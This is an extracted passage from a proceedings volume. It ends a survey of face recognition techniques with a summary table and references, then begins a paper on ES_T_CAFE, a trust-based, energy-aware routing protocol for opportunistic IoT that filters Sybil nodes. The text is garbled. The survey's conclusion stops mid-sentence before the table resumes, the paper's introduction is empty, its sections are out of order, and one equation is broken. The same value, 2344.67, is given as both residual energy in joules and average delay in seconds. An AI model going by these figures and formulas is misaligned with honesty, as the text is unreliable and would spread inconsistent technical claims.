Technique: Benchmark task [26]. Result: Works on testing databases representing 75% of celebrity names, accepting the disambiguation property of human expression. Merit: Works on large datasets to solve classification problems in computer vision and their applications. Demerit: The method does not remove noise from datasets.
Technique: Automatic facial action unit (AU), selective transfer machine (STM) [27]. Result: STM is capable of detecting and improving both AU and holistic expression, improving the performance of samples selected nearest to the test samples. Merit: STM extends the classifier with convex-decision and logistic loss expressions. Demerit: Feedback is confined to the supervised domain, with a lack of training datasets.
Technique: Semi-non-negative matrix factorization [28]. Result: The model learns a two-dimensional representation and gives good results in classification and clustering. Merit: Works on annotated attributes and different data sources, though results on some datasets are not good. Demerit: Unable to address the area of speech recognition.
Technique: Pose-aware models (PAM), CNN [29]. Result: Designed to solve the regular problem and optimize point and loss minimization. Merit: Analysis of IJB-A; landmarks are evaluated and the accuracy of pose estimation improved. Demerit: PAMs are trained with only a single optimization framework.
Technique: Hierarchical method based on two-level learning, local pattern selection (LPS) [30]. Result: Improved accuracy to 94.2% using LPS. Merit: Experiments perform better on the MORPH and Album2 datasets. Demerit: The method does not work as well on low-level images.
Technique: VGG framework, CNN [31]. Result: Works on pre-processed face recognition and provides a powerful representation. Merit: Provides multiple facial features, evaluated under various circumstances. Demerit: Limited data available under mismatched conditions.
Technique: Gesture recognition method, conditional random field (CRF), structural support vector machine (SSVM) [32]. Result: Effective gesture and face recognition on challenging real gesture-based datasets. Merit: The SSVM framework achieves novel gesture recognition in the CRF model, working on multiple features in matching algorithms. Demerit: The criteria are not evaluated on the proposed datasets themselves.
Technique: Priorly trained base poses, predefined skeletal anthropometric constraints [33]. Result: 3D reconstruction of human motion from a monocular image sequence; using periodic functions to model the weights of the base poses turned out to be very effective and stable on periodic motion. Merit: The proposed method performs well under occlusions and noise, on real-world KTH data as well as an outdoor obstacle-jump sequence. Demerit: The method works well on high-level reconstruction noise but is not better on low-level noise.
Technique: Latent low-rank representation (LatLRR), PCA [34]. Result: The proposed method finds better classification results than other representation-based methods, even with a simpler linear classification. Merit: On larger-scale datasets, adopting L1-filtering algorithms gives better performance than other algorithms. Demerit: In the same spirit, integrating other feature learning methods with more sophisticated classification remains to be tried.
Technique: Multiple representation-based face sketch photo synthesis (MrFSPS), Markov model [35]. Result: The approach achieves superior performance on multiple datasets over existing methods, with quality-based recognition performance. Merit: Performs on forensic sketch datasets, using style dependence to improve face recognition with promising results. Demerit: The datasets are very small, so it is unfortunately not easy to find exact results for large numbers.
Technique: Single image super resolution deep CNN (SRCNN) [36]. Result: The proposed SRCNN is capable of improving the reconstruction of images in the corresponding natural channels. Merit: Learns end-to-end mapping between low- and high-resolution images. Demerit: Extra work is needed to explore more filters using other training strategies.
Technique: Compact binary face descriptor (CBFD), pixel difference vectors (PDVs), coupled-CBFD (C-CBFD) [37]. Result: Works on heterogeneous face recognition, reducing the modality gap in datasets through heterogeneous face matching. Merit: Applied to many different face recognition applications, including object recognition and visual tracking. Demerit: Only a single layer is learned per dataset, not for all datasets.
Technique: Multi-state selection graph (MSG) [38]. Result: The method incorporates an indicator matrix and accurately handles missing common foreground objects in some videos. Merit: Provides a general and global framework, allowing optimization that extends standard graph models. Demerit: Does not give exact performance for every video.
Technique: Multitask feature transformation learning (MTFTL), patch-based partial representation (PBPR) [39]. Result: Applied to arbitrary poses in face images, which is very beneficial for existing methods. Merit: Slightly modified to tackle the unconstrained face verification problem, finding top-level performance on challenging datasets. Demerit: Different poses in face texture remain a limitation.
7 Conclusions
This paper analyzed systematic studies of facial recognition and machine learning techniques, including numerous tactics and datasets. It includes a detailed review of face detection and recognition using the various techniques applied by researchers. Machine-learning approaches solve numerous problems related
Technique: Software-based fake detection method [40]. Result: The method performs at a high level for different biometric traits and solves the problem for different types of attacks. Merit: Provides new possibilities for future evaluation, including the assessment, inclusion, and use of video quality measures. Demerit: The approach performs better on high-level attacks than on low-level attacks.
Technique: Gabor and local binary patterns, discriminant face descriptor (DFD), coupled-DFD (CDFD) [41]. Result: Learns to reduce the heterogeneous gap in face images with image filters, examined on both constrained and unconstrained face databases. Merit: Good generalization and a competitive descriptor for face recognition under various circumstances. Demerit: The proposed DFD does not work on video-based analysis.
Technique: High-level feature learning scheme [42]. Result: Produces a novel technique for many-to-one high-level face feature learning, extracting pose-invariant and discriminative identity features from facial images. Merit: Reduces the one-to-one and many-to-one encoder to remove the impact of diverse poses, enhancing pose-free features in multiple random faces. Demerit: The method works only on high-level feature learning.
Technique: CNN, 3DCNN [43]. Result: Characteristics are derived in spatial as well as temporal dimensions; 3D convolutions record motion details encoded across several adjacent frames. Merit: The models outperform on TRECVID data and achieve better performance on the KTH database. Demerit: 3DCNN works with supervised training data, not with unsupervised training databases.
References
1. Shao, M., Zhang, Y., & Fu, Y. (2018). Collaborative random faces-guided encoders for pose-
invariant face representation learning. IEEE Transactions on Neural Networks and Learning
Systems, 29(4), 1019–1032.
2. Tsai, C. C., Li, W., Hsu, K. J., Qian, X., & Lin, Y. Y. (2019). Image co-saliency detection and
co-segmentation via progressive joint optimization. IEEE Transactions on Image Processing,
28(1), 56–71.
3. Hu, Z., Cho, S., Wang, J., & Yang, M. H. (2014). Deblurring low-light images with light
streaks. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition
(pp. 3382–3389).
4. Anwar, S., Huynh, C. P., & Porikli, F. (2018). Image deblurring with a class-specific prior. IEEE
Transactions on Pattern Analysis and Machine Intelligence.
5. Wang, X., Ma, H., Chen, X., & You, S. (2018). Edge preserving and multi-scale contextual
neural network for salient object detection. IEEE Transactions on Image Processing, 27(1),
121–134.
6. Deng, W., Hu, J., & Guo, J. (2018). Compressive binary patterns: Designing a robust binary face
descriptor with random-field eigenfilters. IEEE Transactions on Pattern Analysis & Machine
Intelligence, 1, 1–1.
7. Jerripothula, K. R., Cai, J., & Yuan, J. (2018). Quality-guided fusion-based co-saliency
estimation for image co-segmentation and co-localization. IEEE Transactions on Multimedia.
8. Tulyakov, S., Jeni, L. A., Cohn, J. F., & Sebe, N. (2018). Viewpoint-consistent 3D face alignment. IEEE
Transactions on Pattern Analysis and Machine Intelligence, 40(9), 2250–2264.
9. Dong, X., Zheng, L., Ma, F., Yang, Y., & Meng, D. (2018). Few-example object detection with
model communication. IEEE Transactions on Pattern Analysis & Machine Intelligence, 1, 1–1.
10. Mafi, M., Rajaei, H., Cabrerizo, M., & Adjouadi, M. (2018). A robust edge detection approach
in the presence of high impulse noise intensity through switching adaptive median and fixed
weighted mean filtering. IEEE Transactions on Image Processing, 27(11), 5475–5490.
11. Tao, D., Guo, Y., Li, Y., & Gao, X. (2018). Tensor rank preserving discriminant analysis for
facial recognition. IEEE Transactions on Image Processing, 27(1), 325–334.
12. Wang, W., Yan, Y., Cui, Z., Feng, J., Yan, S., & Sebe, N. (2018). Recurrent face aging with
hierarchical autoregressive memory. IEEE Transactions on Pattern Analysis and Machine
Intelligence.
13. Jeong, S., Lee, J., Kim, B., Kim, Y., & Noh, J. (2018). Object segmentation ensuring consis-
tency across multi-viewpoint images. IEEE Transactions on Pattern Analysis and Machine
Intelligence, 40(10), 2455–2468.
14. Sagonas, C., Ververas, E., Panagakis, Y., & Zafeiriou, S. (2018). Recovering joint and individual
components in facial data. IEEE Transactions on Pattern Analysis and Machine Intelligence,
40(11), 2668–2681.
15. Zhu, X., Lei, Z., & Li, S. Z. (2017). Face alignment in full pose range: A 3D total solution. IEEE
Transactions on Pattern Analysis and Machine Intelligence.
16. Wang, M., & Deng, W. (2018). Deep face recognition: A survey. arXiv preprint arXiv:1804.
06655.
17. Qian, Y., Deng, W., & Hu, J. (2018, May). Task specific networks for identity and face variation.
In 2018 13th IEEE International Conference on Automatic Face & Gesture Recognition (FG
2018) (pp. 271–277). IEEE.
18. Benitez-Quiroz, F., Srinivasan, R., & Martinez, A. M. (2018). Discriminant functional learning
of color features for the recognition of facial action units and their intensities. IEEE Transactions
on Pattern Analysis and Machine Intelligence.
19. Cruz, C., Mehta, R., Katkovnik, V., & Egiazarian, K. O. (2018). Single image super-resolution
based on Wiener filter in similarity domain. IEEE Transactions on Image Processing, 27(3),
1376–1389.
20. Wang, X., Zhou, Y., Kong, D., Currey, J., Li, D., & Zhou, J. (2017, May). Unleash the black
magic in age: a multi-task deep neural network approach for cross-age face verification. In 2017
12th IEEE International Conference on Automatic Face & Gesture Recognition (FG 2017)
(pp. 596–603). IEEE.
21. Duong, C. N., Quach, K. G., Luu, K., Le, T. H. N., & Savvides, M. (2017, Oct). Temporal
non-volume preserving approach to facial age-progression and age-invariant face recognition.
In 2017 IEEE International Conference on Computer Vision (ICCV) (pp. 3755–3763). IEEE.
22. He, R., Wu, X., Sun, Z., & Tan, T. (2017). Learning Invariant Deep Representation for NIR-VIS
Face Recognition. In AAAI (Vol. 4, pp. 7).
23. Hu, L., Kan, M., Shan, S., Song, X., & Chen, X. (2017, May). LDF-Net: Learning a
displacement field network for face recognition across pose. In 2017 12th IEEE International
Conference on Automatic Face & Gesture Recognition (FG 2017) (pp. 9–16). IEEE.
24. Galea, C., & Farrugia, R. A. (2017). Forensic face photo-sketch recognition using a deep
learning-based architecture. IEEE Signal Processing Letters, 24(11), 1586–1590.
25. Ranjan, R., Sankaranarayanan, S., Castillo, C. D., & Chellappa, R. (2017, May). An all-in-one
convolutional neural network for face analysis. In 2017 12th IEEE International Conference
on Automatic Face & Gesture Recognition (FG 2017) (pp. 17–24). IEEE.
26. Guo, Y., Zhang, L., Hu, Y., He, X., & Gao, J. (2016, Oct). Ms-celeb-1m: A dataset and
benchmark for large-scale face recognition. In European Conference on Computer Vision
(pp. 87–102). Springer, Cham.
27. Chu, W. S., De la Torre, F., & Cohn, J. F. (2017). Selective transfer machine for personalized
facial expression analysis. IEEE Transactions on Pattern Analysis and Machine Intelligence,
39(3), 529–545.
28. Trigeorgis, G., Bousmalis, K., Zafeiriou, S., & Schuller, B. W. (2017). A deep matrix factor-
ization method for learning attribute representations. IEEE Transactions on Pattern Analysis
and Machine Intelligence, 39(3), 417–429.
29. Masi, I., Chang, F. J., Choi, J., Harel, S., Kim, J., Kim, K., & AbdAlmageed, W. (2018).
Learning pose-aware models for pose-invariant face recognition in the wild. IEEE Transactions
on Pattern Analysis and Machine Intelligence.
30. Li, Z., Gong, D., Li, X., & Tao, D. (2016). Aging face recognition: A hierarchical learning model
based on local patterns selection. IEEE Transactions on Image Processing, 25(5), 2146–2154.
31. Mehdipour Ghazi, M., & Kemal Ekenel, H. (2016). A comprehensive analysis of deep learning
based representation for face recognition. In Proceedings of the IEEE Conference on Computer
Vision and Pattern Recognition Workshops (pp. 34–41).
32. Chang, J. Y. (2016). Nonparametric feature matching based conditional random fields for
gesture recognition from multi-modal video. IEEE Transactions on Pattern Analysis and
Machine Intelligence, 38(8), 1612–1625.
33. Wandt, B., Ackermann, H., & Rosenhahn, B. (2016). 3d reconstruction of human motion from
monocular image sequences. IEEE Transactions on Pattern Analysis and Machine Intelligence,
38(8), 1505–1516.
34. Zhou, P., Lin, Z., & Zhang, C. (2016). Integrated low-rank-based discriminative feature learning
for recognition. IEEE Transactions on Neural Networks and Learning Systems, 27(5), 1080–
1093.
35. Peng, C., Gao, X., Wang, N., Tao, D., Li, X., & Li, J. (2016). Multiple Representations-Based
Face Sketch-Photo Synthesis. IEEE Transactions on Neural Networks and Learning Systems,
27(11), 2201–2215.
36. Dong, C., Loy, C. C., He, K., & Tang, X. (2016). Image super-resolution using deep convo-
lutional networks. IEEE Transactions on Pattern Analysis and Machine Intelligence, 38(2),
295–307.
37. Lu, J., Liong, V. E., Zhou, X., & Zhou, J. (2015). Learning compact binary face descriptor for
face recognition. IEEE Transactions on Pattern Analysis and Machine Intelligence, 37(10),
2041–2056.
38. Fu, H., Xu, D., Zhang, B., Lin, S., & Ward, R. K. (2015). Object-based multiple foreground
video co-segmentation via multi-state selection graph. IEEE Transactions on Image Processing,
24(11), 3415–3424.
A Survey: Approaches to Facial Detection and Recognition … 125
39. Ding, C., Xu, C., & Tao, D. (2015). Multi-task pose-invariant face recognition. IEEE
Transactions on Image Processing, 24(3), 980–993.
40. Galbally, J., Marcel, S., & Fierrez, J. (2014). Image quality assessment for fake biometric
detection: Application to iris, fingerprint, and face recognition. IEEE Transactions on Image
Processing, 23(2), 710–724.
41. Lei, Z., Pietikäinen, M., & Li, S. Z. (2014). Learning discriminant face descriptor. IEEE
Transactions on Pattern Analysis and Machine Intelligence, 36(2), 289–302.
42. Zhang, Y., Shao, M., Wong, E. K., & Fu, Y. (2013). Random faces guided sparse many-to-
one encoder for pose-invariant face recognition. In Proceedings of the IEEE International
Conference on Computer Vision (pp. 2416–2423).
43. Ji, S., Xu, W., Yang, M., & Yu, K. (2013). 3D convolutional neural networks for human action
recognition. IEEE Transactions on Pattern Analysis and Machine Intelligence, 35(1), 221–231.
An Energy- and Space-Efficient
Trust-Based Secure Routing for OppIoT
N. Kandhoul (B)
Division of Information Technology, NSIT, University of Delhi, New Delhi, India
S. K. Dhurandher
Department of Information Technology, Netaji Subhas University of Technology, New Delhi,
India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 127
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_10
128 N. Kandhoul and S. K. Dhurandher
1 Introduction
2 Related Work
In this section, existing works related to the energy and security of OppIoT networks
are discussed.
Gao et al. [9] presented a routing protocol that is efficient in terms of energy, and
the forwarding decision is based on speed and residual energy of a node for preventing
unnecessary accumulation of data and uncontrolled spraying. The protocol utilizes
energy efficiently. However, the protocol assumes a sink node that possesses unlim-
ited memory, power and computation capacity, which is unrealistic. It is based on the
assumption that all nodes have equal communication range which is not possible in
real scenarios. Chilipirea et al. [10] proposed an energy-aware extension of BUBBLE
Rap routing protocol for opportunistic networks that combined energy optimization
with socially aware routing for balancing the energy consumption. A node with high
social importance was ranked higher and chosen for routing which led to its energy
getting drained. Thus, this protocol added the updated utility function such that its
value decreases if a node has lower energy value. This led to a reduction in the nodes
probability of acting as a successful carrier of message. This approach did not address
the security issues. Duan et al. [11] proposed a game theoretic risk strategy model for
determining the trust of nodes in the network. Using Nash equilibrium, probability
of the selected strategy was calculated. The energy cost was considered to be pro-
portional to the trust. The system used watchdog mechanism which added overhead
to the system. Each node makes a trust request to which the neighbors respond with
recommendations, and this adds too much overhead and thus wastes energy which is
contradictory to the energy saving goal. SOA-based security protocol was given by
Chen et al. [6] where the trust is computed using collaborative filtering of feedback
based on social contacts, interest relationships community and similarity rating of
friendship. Sharma et al. [12] proposed a secure defense against blackhole and grey-
hole attacks based on history data. It made predictions about behavior considering
the average time for forwarding.
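The energy-aware utility adjustment described above for the BUBBLE Rap extension can be sketched as follows; the linear scaling of social rank by normalized residual energy is an illustrative assumption, not the authors' exact function.

```python
def energy_aware_utility(social_rank: float, residual_energy: float,
                         initial_energy: float) -> float:
    """Scale a node's social-centrality rank by its normalized residual
    energy, so depleted nodes are less likely to be chosen as carriers.

    The linear scaling is an illustrative choice: Chilipirea et al.
    describe the idea (utility decreases with lower energy), but this
    is not their exact utility function.
    """
    energy_ratio = residual_energy / initial_energy  # normalized to [0, 1]
    return social_rank * energy_ratio

# A highly social but nearly drained node loses to a moderately
# social node with a nearly full battery.
drained = energy_aware_utility(social_rank=0.9, residual_energy=100, initial_energy=1000)
fresh = energy_aware_utility(social_rank=0.5, residual_energy=950, initial_energy=1000)
```

This captures the trade-off discussed above: the protocol deliberately lowers the carrier probability of socially important nodes as their batteries drain.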
Krishna and Lorenz [13] proposed DASHOP, a trust- and hashing-based secure
opportunistic message transmission technique for IoT networks. The base
stations were assumed to be trusted for coordinating with other nodes, and
keys were generated using the computation-intensive elliptic curve digital
signature algorithm; the limited power of
the nodes was not taken into consideration. Dhurandher et al. [14] proposed a trust-
and cryptography-based security approach. This scheme made lots of computations
and assumed too much infrastructure. Borah et al. [15] presented ELPFR-MC, a
location predicting protocol that is energy aware and makes routing decision based
on current energy level of a node and its probability of message delivery to the des-
tination. This is an energy-aware protocol, and security is not implemented while
performing message routing. An RSA-based secure routing protocol was proposed by
Kandhoul et al. [16] for OppIoT. This scheme used RSA for message encryption and
detected the packet fabrication attack; the efficiency of the routing protocol was not
considered.
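To illustrate the general idea of hash-based message protection used by schemes such as DASHOP [13], the sketch below tags each message with a keyed hash so that a relay can detect fabricated or modified packets. This is a simplified stand-in: the actual protocol uses elliptic curve digital signatures and trusted base stations, and the pre-shared key here is a hypothetical simplification.

```python
import hashlib
import hmac

def tag_message(key: bytes, payload: bytes) -> bytes:
    """Attach a keyed hash (HMAC-SHA256) to a payload so relays can
    detect fabricated or tampered packets. Illustrative only: the real
    DASHOP scheme is built on elliptic curve digital signatures."""
    return hmac.new(key, payload, hashlib.sha256).digest()

def verify_message(key: bytes, payload: bytes, tag: bytes) -> bool:
    """Recompute the tag and compare in constant time."""
    return hmac.compare_digest(tag_message(key, payload), tag)

key = b"shared-secret"            # hypothetical pre-shared key
msg = b"sensor-reading:42"
tag = tag_message(key, msg)

ok = verify_message(key, msg, tag)                     # genuine message
forged = verify_message(key, b"sensor-reading:99", tag)  # tampered payload
```

A forwarding node holding the key can thus drop any packet whose tag does not verify, which is the behavior the trust-based schemes above try to encourage.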
3.1 Motivation
OppIoT is assumed to comprise a wide range of devices such as small sensors and
power-limited devices, constrained in terms of storage and battery.
In addition to limited power and space, another challenge is the secure transmission
of data: in OppIoT, data is broadcast to neighbors, revealing it to
attackers as well. Thus, the current scenario calls for the design of secure techniques for
sharing data that are energy and space efficient. The work in literature has not given
much importance to limited space and power. T_CAFE is a trust-based protocol that
protects the network from several attacks. But it does not consider the constrained
energy and storage of the devices involved in the network. The malicious nodes waste
the storage by sending fake messages and drain the energy resources of the nodes by
engaging them in unnecessary packet forwarding. This has motivated us in designing
an energy- and space-efficient version of T_CAFE called as ES_T_CAFE.
ES_T_CAFE considers that all the member nodes of OppIoT cooperate with one
another for message transmission. It is also assumed that the nodes have sufficient
buffer capacity for storing their context information. Some of the nodes behave
maliciously and execute Sybil attack in the network.
Each node maintains a table of already detected malicious hosts. Upon encounter
with a node, the carrier node checks if the node is malicious. If yes, it waits for some
other node. If the node is benign, it checks its residual buffer space and energy. If
the node does not have sufficient space, the chances of a packet getting dropped are
high. Similarly, if the power is low, the node might not be able to sustain the packet
forwarding procedure, thus reducing the packet delivery probability. The residual
energy is normalized as follows:
get_curr ent_Energy()
Residual_Energycarrier = (1)
get_intial_energy()
The normalization performed above is necessary to bring the values in the range of
0 to 1. Finally, the ES parameter is computed for each node as ES_node = α ∗ Residual_Energy + β ∗ Residual_Buffer (Algorithm 1, line 9), and the threshold is obtained by averaging over the encountered nodes:

ES_Threshold = (Σ_{node=1}^{n} ES_node) / count    (4)
If ES_node is greater than ES_Threshold, the next step is to compare its trust.
The trust is computed as the sum of direct trust, derived from the node's social
behavior, and indirect trust, computed on the basis of recommendations received
from neighboring nodes. The details regarding trust computation have already been
given in [7]. If any two neighbors are similar to one another beyond a threshold,
they are said to be performing Sybil attack. The attackers thus detected are added
to malicious table, thus identifying the Sybil nodes and successfully secluding them
from participation in the packet transmission. If a neighbor possesses high trust value,
the message is forwarded to it, else the carrier waits for a better message forwarder.
The entire routing process is described in Algorithm 1.
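As a concrete illustration of the carrier-selection step (Eqs. (1) and (4)), the following sketch computes the ES parameter and its threshold; the weights α = β = 0.5 and the sample node values are illustrative assumptions, not values taken from the paper.

```python
def residual_energy_ratio(current_energy: float, initial_energy: float) -> float:
    """Eq. (1): normalize residual energy into the range [0, 1]."""
    return current_energy / initial_energy

def es(node: dict, alpha: float = 0.5, beta: float = 0.5) -> float:
    """ES parameter (Algorithm 1, line 9): weighted sum of normalized
    residual energy and residual buffer. alpha and beta are assumed
    weights; the paper only requires them to be constants."""
    return alpha * node["energy_ratio"] + beta * node["buffer_ratio"]

def es_threshold(nodes: list) -> float:
    """Eq. (4): average ES over the count of encountered nodes."""
    return sum(es(n) for n in nodes) / len(nodes)

ratio = residual_energy_ratio(2500.0, 5000.0)     # 0.5

# Hypothetical encountered nodes with already-normalized ratios.
nodes = [
    {"energy_ratio": 0.9, "buffer_ratio": 0.8},   # healthy node
    {"energy_ratio": 0.4, "buffer_ratio": 0.3},   # depleted node
]
thr = es_threshold(nodes)                         # (0.85 + 0.35) / 2 = 0.60
eligible = [n for n in nodes if es(n) >= thr]     # only the healthy node passes
```

Only nodes whose ES value clears the average-based threshold proceed to the trust comparison, which matches the two-stage filtering the text describes.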
4 Performance Evaluation
Algorithm 1 : ES_T_CAFE
1: Begin
2: Initialize Trust = 0.5 for every node.
3: For the present situation, node A is considered the Trustor and B is assumed to be the Trustee.
4: if (Malicious_table.containsKey(B)) then
5:     continue; wait for a benign node.
6: else
7:     Compute Residual_Energy as: Residual_Energy_B = get_current_Energy() / get_initial_energy()
8:     Compute Residual_Buffer as: Residual_Buffer_B = get_Free_Buffer_Size() / get_Buffer_Size()
9:     Compute ES as: ES_B = (α ∗ Residual_Energy + β ∗ Residual_Buffer)
10: end if
11: Compute ES_Threshold as: ES_Threshold = (Σ_{node=1}^{n} ES_node) / count
12: if (ES_B < ES_Threshold) then
13:     continue; wait for a better carrier.
14: else
15:     for every neighbor (Neigh_i) of A do
16:         Calculate the packet forwarding ratio: FwR_AB = n_(A,B) / n_(Total_B)
17:         Compute amiability as:
                Freq_AB = (f_(A,B) + f_(B,D)) / (f_(A_Total) + f_(B_Total))
                Dur_AB = (d_(A,B) + d_(B,D)) / (d_(A_Total) + d_(B_Total))
                Rec_AB = (r_(A,B) + r_(B,D)) / (r_(A_Total) + r_(B_Total))
                Amb = Freq + Dur + Rec
18:         Calculate the encounter ratio with respect to destination D: EncR_BD = c_(B,D) / c_(Total_B)
19:         if ((Amb + EncR) > Sybil_threshold) then
20:             Add Neigh_i to malicious_table as a Mal_Sybil node.
21:         end if
22:         Calculate the correctly delivered packets' ratio: CoPR_AB = Correct_Packets_Forwarded_(A,B) / Total_Packets_Received_B
23:         Calculate the Direct Trust: Direct_Trust_(A,B) = θ ∗ CoPR + δ ∗ Amb + γ ∗ FwR + λ ∗ EncR, where θ, δ, γ, λ are constants whose sum equals 1.
24:     end for
25: end if
26: A takes recommendations regarding B from neighbors.
27: if (count(recomdtn) = 0) then
28:     Aging of the direct trust is performed: Dt_Trust(t)_(A,B) = e^(−φt) ∗ Direct_Trust(t − 1); Direct_Trust_(A,B) = Dt_Trust(t)_(A,B)
29: else
30:     if (Malicious_table.containsKey(Neigh_i)) then
31:         Encountered node is malicious; continue;
32:     else
33:         Calculate the Indirect Trust of A on B: Indirect_Trust_(A,B) = (Σ_{i=0}^{N} Direct_Trust_(Neigh_i,B)) / N
34:     end if
35: end if
36: Calculate the total Trust: Trust_(A,B) = σ ∗ Direct_Trust_(A,B) + ω ∗ Indirect_Trust_(A,B)
37: if (Trust_(A,B) > Trust_Threshold_A) then
38:     Send the packet to B.
39: else
40:     Wait until a better carrier is encountered.
41: end if
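The trust computation and forwarding decision of Algorithm 1 (lines 23, 33, 36 and 37) can be sketched as follows; the weight values and the trust threshold are illustrative assumptions, since the paper only requires the weights to be constants summing to 1.

```python
def direct_trust(copr: float, amb: float, fwr: float, encr: float,
                 theta: float = 0.4, delta: float = 0.2,
                 gamma: float = 0.2, lam: float = 0.2) -> float:
    """Algorithm 1, line 23: weighted combination of the behavioural
    ratios; theta + delta + gamma + lam must equal 1 (values assumed)."""
    return theta * copr + delta * amb + gamma * fwr + lam * encr

def indirect_trust(neighbour_opinions: list) -> float:
    """Algorithm 1, line 33: mean of the neighbours' direct trust in B."""
    return sum(neighbour_opinions) / len(neighbour_opinions)

def total_trust(direct: float, indirect: float,
                sigma: float = 0.6, omega: float = 0.4) -> float:
    """Algorithm 1, line 36: blend of direct and indirect trust."""
    return sigma * direct + omega * indirect

def should_forward(direct: float, neighbour_opinions: list,
                   trust_threshold: float = 0.5) -> bool:
    """Algorithm 1, lines 36-41: forward only to carriers whose total
    trust exceeds the threshold (threshold value assumed)."""
    return total_trust(direct, indirect_trust(neighbour_opinions)) > trust_threshold

dt = direct_trust(copr=0.9, amb=0.6, fwr=0.8, encr=0.7)  # 0.78
decision = should_forward(dt, [0.7, 0.8, 0.6])           # ~0.748 > 0.5, so forward
```

When no recommendations arrive, Algorithm 1 instead ages the stale direct trust with the exponential factor e^(−φt) (line 28) before using it alone.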
[Fig. 1 Delivery probability vs. buffer size (MB) for ELPFR-MC, T_CAFE and ES_T_CAFE]
Figure 2 shows the impact of increasing buffer size on the residual energy level of
a node at the completion of simulation. As the buffer size is increased, there are
fewer chances of a packet getting dropped, thereby saving the node's energy. Thus, with
increasing buffer size, the leftover energy of a node also increases. The average value
of leftover energy for ES_T_CAFE is 2344.67 J which is 11% higher than T_CAFE
and 38% higher than ELPFR-MC. The impact of varying buffer on average latency is
shown in Fig. 4. With increasing buffer size, the latency increases as the packet spends
more time in the buffer. The average delay in delivering packets for ES_T_CAFE is
observed to be 2344.67 s.
[Fig. 2 Node's residual energy (J) vs. buffer size (MB) for ELPFR-MC, T_CAFE and ES_T_CAFE]
[Fig. 3 Messages dropped vs. buffer size (MB) for ELPFR-MC, T_CAFE and ES_T_CAFE]
[Fig. 4 Average latency (s) vs. buffer size (MB) for ELPFR-MC, T_CAFE and ES_T_CAFE]
[Fig. 5 Delivery probability vs. TTL (minutes) for ELPFR-MC, T_CAFE and ES_T_CAFE]
[Fig. 6 Node's residual energy (J) vs. TTL (minutes) for ELPFR-MC, T_CAFE and ES_T_CAFE]
The effect of changing the packet's time to live (TTL) on the simulation metrics is
then observed, as shown in Figs. 5, 6, 7 and 8. Figure 5 shows that raising the
message TTL results in a drop in the probability of message delivery. This is due to the
fact that the buffer is more occupied with increased message TTL, as the messages
tend to live longer, thus raising the probability of messages getting dropped. The
average probability of message delivery for ES_T_CAFE is 0.3934, which is 8.42%
better than T_CAFE and 18% higher than ELPFR-MC. The residual
energy at the end of simulation drops with increasing TTL, as shown in Fig. 6. As the
messages spend a longer time in the buffer, the node's energy is wasted in dropping
them later on to free the buffer. The average residual energy for ES_T_CAFE is
30261.51 J, which is the highest.
From Fig. 7, it can be observed that the count of packets getting dropped increases
with growing TTL. The messages stay in the buffer for a longer period of time, enhancing
their chances of getting dropped, as depicted in Fig. 5. The average count of dropped
[Fig. 7 Messages dropped vs. TTL (minutes) for ELPFR-MC, T_CAFE and ES_T_CAFE]
[Fig. 8 Average latency (s) vs. TTL (minutes) for ELPFR-MC, T_CAFE and ES_T_CAFE]
messages for ES_T_CAFE is 5.42% lower than T_CAFE and 9.1% lower than
ELPFR-MC. The average delay in packet delivery increases with increasing TTL;
Figure 8 shows that the observed delay for ES_T_CAFE is around 3414.97 s.
5 Conclusion
An energy- and space-efficient secure routing protocol for OppIoT (called ES_T_
CAFE) is proposed in this paper. ES_T_CAFE depends on the node’s leftover energy,
free buffer size and trust-based probability of packet delivery for making message
forwarding decisions. Including the parameters of space and energy enhances the
efficiency of routing protocols as the devices involved are usually constrained in terms
of storage space and battery capacity. Simulation results prove that ES_T_CAFE
outperforms T_CAFE and ELPFR-MC in terms of node’s residual energy, messages
dropped, message delivery probability and average latency. In the future, the authors
plan to investigate the impact of message encryption on the proposed scheme.
References
1. Atzori, L., Iera, A., & Morabito, G. (2010). The internet of things: A survey. Computer Net-
works, 54(15), 2787–2805.
2. Pelusi, L., Passarella, A., & Conti, M. (2006). Opportunistic networking: Data forwarding in
disconnected mobile ad hoc networks. IEEE Communications Magazine, 44(11), 134–141.
3. Guo, B., Zhang, D., Wang, Z., Yu, Z., & Zhou, X. (2013). Opportunistic IoT: Exploring the
harmonious interaction between human and the internet of things. Journal of Network and
Computer Applications, 36(6), 1531–1539.
4. Sicari, S., Rizzardi, A., Grieco, L. A., & Coen-Porisini, A. (2015). Security, privacy and trust
in internet of things: The road ahead. Computer Networks, 76, 146–164.
5. Wu, Y., Zhao, Y., Riguidel, M., Wang, G., & Yi, P. (2015). Security and trust management in
opportunistic networks: A survey. Security and Communication Networks, 8(9), 1812–1827.
6. Chen, R., Guo, J., & Bao, F. (2016). Trust management for SOA-based IoT and its application
to service composition. IEEE Transactions on Services Computing, 9(3), 482–495.
7. Kandhoul, N., Dhurandher, S. K., & Woungang, I. (2019). T_CAFE: A
trust based security approach for opportunistic IoT. IET Communications.
8. Dhakne, A. R., & Chatur, P. N. (2017). Detailed survey on attacks in wireless sensor network.
In Proceedings of the International Conference on Data Engineering and Communication
Technology (pp. 319–331). Springer.
9. Gao, S., Zhang, L., & Zhang, H. (2010). Energy-aware spray and wait routing in mobile
opportunistic sensor networks. In 2010 3rd IEEE Intl. Conference on Broadband Network and
Multimedia Technology (pp. 1058–1063). IEEE.
10. Chilipirea, C., Petre, A.-C., & Dobre, C. (2013). Energy-aware social-based routing in oppor-
tunistic networks. In 2013 27th International Conference on Advanced Information Networking
and Applications Workshops (pp. 791–796). IEEE.
11. Duan, J., Gao, D., Yang, D., Foh, C. H., & Chen, H.-H. (2014). An energy-aware trust derivation
scheme with game theoretic approach in wireless sensor networks for IoT applications. IEEE
Internet of Things, 1(1), 58–69.
12. Sharma, D. K., Dhurandher, S. K., Woungang, I., Arora, J., & Gupta, K. (2016). History-based
secure routing protocol to detect blackhole and greyhole attacks in opportunistic networks. In
Recent Advances in Communications and Networking Technology (Vol. 5, No. 2, pp. 73–89).
13. Krishna, M. B., & Lorenz, P. (2017). Delay aware secure hashing for opportunistic message
forwarding in internet of things. In Globecom Workshops, 1–6. IEEE.
14. Dhurandher, S. K., Kumar, A., & Obaidat, M. S. (2017). Cryptography-based misbehaviour
detection and trust control mechanism for opportunistic network systems. IEEE Systems Jour-
nal, 12(4), 3191–3202.
